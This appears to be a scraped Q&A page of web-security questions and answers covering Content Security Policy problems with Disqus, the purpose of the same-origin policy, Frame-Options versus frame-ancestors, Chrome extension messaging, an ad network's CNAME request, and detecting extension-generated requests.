Disqus only works when scripts fail Content Security Policy - content-security-policy

I've been battling an intermittent issue with Disqus on a blog page. The issue has been difficult to pin down as it will work sporadically.
Managed to pin the issue down to this:
If the following scripts fail to load due to Content Security Policy then everything works fine and the iframe shows.
Adding the domain to the authorised domain list on Disqus has allows the following progress, and the issue is now less common, however it's still not perfect, refreshing the page will prevent the iframe loading, refresh again and it appears!!
If anyone has any ideas how I can get this working properly it would be greatly appreciated.

From what it looks like there are few directive missing from you CSP exclusion list. I would suggest following:
Use tools like report-uri to report CSP violations on your domain. Report-URI is life saver, I'm speaking from my experience.
If you are applying the CSP policy for the first time in your application, then start with CSP-Report only.
The HTTP Content-Security-Policy-Report-Only response header allows web developers to experiment with policies by monitoring (but
not enforcing) their effects. These violation reports consist of JSON
documents sent via an HTTP POST request to the specified URI.
This is important because you cannot manually check all the violations. It is better that you determine all the violations over a period of time and make your CSP policy more restrictive.
Once, you have a confidence with your CSP policy then you can create a CSP policy with more confidence. However, ensure that you still report the violations to report-uri or your logging.
Much of these things are trial and error as you do not know what scripts your "trusted" 3rd-party libraries are using. You also cannot control if their code/ implementation change under the hood. Hence, monitoring helps you to continuously determine a violation and take appropriate action.

Related

Why does the Same Origin Policy prevent reading GET responses?

I've done a bit of research on the web and searched through a few questions about SOP and what kinds of abuse it mitigates, but most answers are focused on preventing stolen credentials. This makes sense to me.
What doesn't make sense to me is why browsers following SOP rules block the response outright, rather than blocking cookie and local storage access.
In other words, if cookies and local storage didn't exist, would there still be a need to prevent reading GET responses? Presumably this is already what happens to some degree with <img>, <script>, and <iframe>.
According to Mozilla Developer Network :
The same-origin policy restricts how a document or script loaded from one origin can interact with a resource from another origin. It is a critical security mechanism for isolating potentially malicious documents.
According to RFC 6454 :
Although user agents group URIs into origins, not every resource in
an origin carries the same authority (in the security sense of the
word "authority", not in the [RFC3986] sense). For example, an image
is passive content and, therefore, carries no authority, meaning the
image has no access to the objects and resources available to its
origin. By contrast, an HTML document carries the full authority of
its origin, and scripts within (or imported into) the document can
access every resource in its origin.
To answer your question, even if cookies and local storage didn't exist, it will be still dangerous to execute unknown script in the context of the document. These scripts could issue XHR requests with the same IP as the authorized scripts and behave badly.

Is Frame-Options a standard or it's only a draft with no schedule to approve?

OWASP has a page where they suggest to use x-frame-options and frame-options to prevent clickjacking. The latter is defined as a draft few yeards ago, but I cannot find the information on any implementation or acceptance of this draft. Is it accepted, is it planned to or in other words what is it's status and should we be adding it or only use x-frame-options for now.
Frame-Options is not standard.
The new standard is to use CSP's frame-ancestors directive.
The frame-ancestors directive specifies valid parents that may embed
a page using the <frame> and <iframe> elements. This directive is not
supported in the element or by the
Content-Security-Policy-Report-Only header field.
As this is a new standard (see browser support here), it is advised to also use X-Frame-Options is the meantime while all browsers your platform supports either catch up or fizzle out.
It is advised that the server responds with an X-Frame-Options header for irrespective of whether or not the draft has been approved. I have pulled the following content from Acunetix vulnerability description:
Clickjacking (User Interface redress attack, UI redress attack, UI redressing) is a malicious technique of tricking a Web user into clicking on something different from what the user perceives they are clicking on, thus potentially revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages.
My impression is that the draft is not standardized (atleast at the time of this post) because X-Frame-Options is implemented differently through different browsers, leading to unintended results and behavior—however, this is just my speculation and could be for completely different reasons.

Should I expect any issues if I want to communicate between a secure (https) Website and a chrome extension?

I have a chrome extension that currently communicates with a website over http, what would be the difficulties/problems that could occur if I switch my website to be https.
Communication is done using this method (chrome.runtime.sendMessage)
https://developer.chrome.com/extensions/messaging#external-webpage
And I also pull some Iframe pages from the website
As far as chrome.runtime messaging goes, Chrome does not care, as long as you have permissions.
And that might be your problem if you specified your match patterns as "http://example.com/*" instead of "*://example.com/*". Adding a permission for HTTPS if it wasn't there before may trigger a new permission warning, which is.. unpleasant.
Triggering a new permission warning for an already-deployed extension means that the extension is automatically disabled after the update.
The user is then presented with a popup explaining that the extension was disabled due to requesting more permissions that it had, and requesting the user to review them (or leave the extension disabled). You run the risk of users deciding not to bother, or misunderstand this warning and think it's malware / complain.
Fortunately, "externally_connectable" match patterns do not trigger warnings - because such connections always have to be initiated by the page. If, however, you are also using a permission to do XHR, or a match pattern to inject a content script - the above applies.
You could potentially employ optional permissions to avoid this scenario, but that's a complicated way.

Cross-site scripting vulnerability because of a CNAME entry

One of our advertising networks for a site I administer and develop is requesting the following:
We have been working on increasing performance on XXXX.com and our team feels that if we can set up the following CNAME on that domain it will help increase rates:
srv.XXXX.com d2xf3n3fltc6dl.XXXX.net
Could you create this record with your domain registrar? The reason we need you to create this CNAME is to preserve domain transparency within our RTB. Once we get this setup I will make some modifications in your account that should have some great results.*
Would this not open up our site to cross-site scripting vulnerabilities? Wouldn't malicious code be able to masquerade as coming from our site to bypass same-origin policy protection in browsers? I questioned him on this and this was his response:
First off let me address the benefits. The reason we would like you to create this CNAME is to increase domain transparency within our RTB. Many times when ads are fired, JS is used to scrape the URL and pass it to the buyer. We have found this method to be inefficient because sometimes the domain information does not reach the market place. This causes an impression (or hit) to show up as “uncategorized” rather than as “XXXX.com” and this results in lower rates because buyer pay up to 80% less for uncategorized inventory. By creating the CNAME we are ensuring that your domain shows up 100% of the time and we usually see CPM and revenue increases of 15-40% as a result.
I am sure you are asking yourself why other ad networks don’t do this. The reason is that this is not a very scalable solution, because as you can see, we have to work with each publisher to get this setup. Unlike big box providers like Adsense and Lijit, OURCOMPANY is focused on maximizing revenue for a smaller amount of quality publishers, rather than just getting our tags live on as many sites as possible. We take the time and effort to offer these kinds of solutions to maximize revenue for all parties.
In terms of security risks, they are minimal to none. You will simply be pointing a subdomain of XXXX.com to our ad creative server. We can’t use this to run scripts on your site, or access your site in any way.
Adding the CNAME is entirely up to you. We will still work our hardest to get the best rates possible, with or without that. We have just seen great results with this for other publishers, so I thought that I would reach out and see if it was something you were interested in.
This whole situation raised red flags with me but is really outside of my knowledge of security. Can anyone offer any insight to this please?
This would enable cookies set at the XXXX.com level to be read by each site, but it would not allow other Same Origin Policy actions unless both sites opt in. Both sites would have to set document.domain = 'XXXX.com'; in client-side script to allow access to both domains.
From MDN:
Mozilla distinguishes a document.domain property that has never been set from one explicitly set to the same domain as the document's URL, even though the property returns the same value in both cases. One document is allowed to access another if they have both set document.domain to the same value, indicating their intent to cooperate, or neither has set document.domain and the domains in the URLs are the same (implementation). Were it not for this special policy, every site would be subject to XSS from its subdomains (for example, https://bugzilla.mozilla.org could be attacked by bug attachments on https://bug*.bugzilla.mozilla.org).

Identifying requests made by Chrome extensions?

I have a web application that has some pretty intuitive URLs, so people have written some Chrome extensions that use these URLs to make requests to our servers. Unfortunately, these extensions case problems for us, hammering our servers, issuing malformed requests, etc, so we are trying to figure out how to block them, or at least make it difficult to craft requests to our servers to dissuade these extensions from being used (we provide an API they should use instead).
We've tried adding some custom headers to requests and junk-json-preamble to responses, but the extension authors have updated their code to match.
I'm not familiar with chrome extensions, so what sort of access to the host page do they have? Can they call JavaScript functions on the host page? Is there a special header the browser includes to distinguish between host-page requests and extension requests? Can the host page inspect the list of extensions and deny certain ones?
Some options we've considered are:
Rate-limiting QPS by user, but the problem is not all queries are equal, and extensions typically kick off several expensive queries that look like user entered queries.
Restricting the amount of server time a user can use, but the problem is that users might hit this limit by just navigating around or running expensive queries several times.
Adding static custom headers/response text, but they've updated their code to mimic our code.
Figuring out some sort of token (probably cryptographic in some way) we include in our requests that the extension can't easily guess. We minify/obfuscate our JS, so are ok with embedding it in the JS source code (since the variable name it would have would be hard to guess).
I realize this may not be a 100% solvable problem, but we hope to either give us an upper hand in combatting it, or make it sufficiently hard to scrape our UI that fewer people do it.
Welp, guess nobody knows. In the end we just sent a custom header and starting tracking who wasn't sending it.

Resources